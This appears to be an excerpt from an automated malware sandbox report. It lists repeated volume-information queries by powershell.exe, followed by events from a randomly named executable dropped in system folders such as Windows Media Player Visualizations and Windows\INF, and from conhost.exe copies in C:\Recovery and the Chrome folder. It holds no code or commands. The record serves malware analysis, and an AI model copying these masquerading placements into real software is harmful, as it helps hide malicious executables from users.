Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                          Source: C:\Recovery\conhost.exeQueries volume information: C:\Recovery\conhost.exe VolumeInformation
                          Source: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Program Files\Windows Security\BrowserCore\en-US\TezdDRgSgyeGDKRkzk.exe VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Windows\System32\cmd.exeQueries volume information: C:\ VolumeInformation
                          Source: C:\Program Files\Google\Chrome\Application\conhost.exeQueries volume information: C:\Program Files\Google\Chrome\Application\conhost.exe VolumeInformation
                          Source: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\INF\.NET CLR Data\TezdDRgSgyeGDKRkzk.exe VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exe VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Web\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Web.dll VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Gabriola.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\georgiab.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\impact.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformation
                          Source: C:\Program Files (x86)\Windows Media Player\Visualizations\TezdDRgSgyeGDKRkzk.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformation
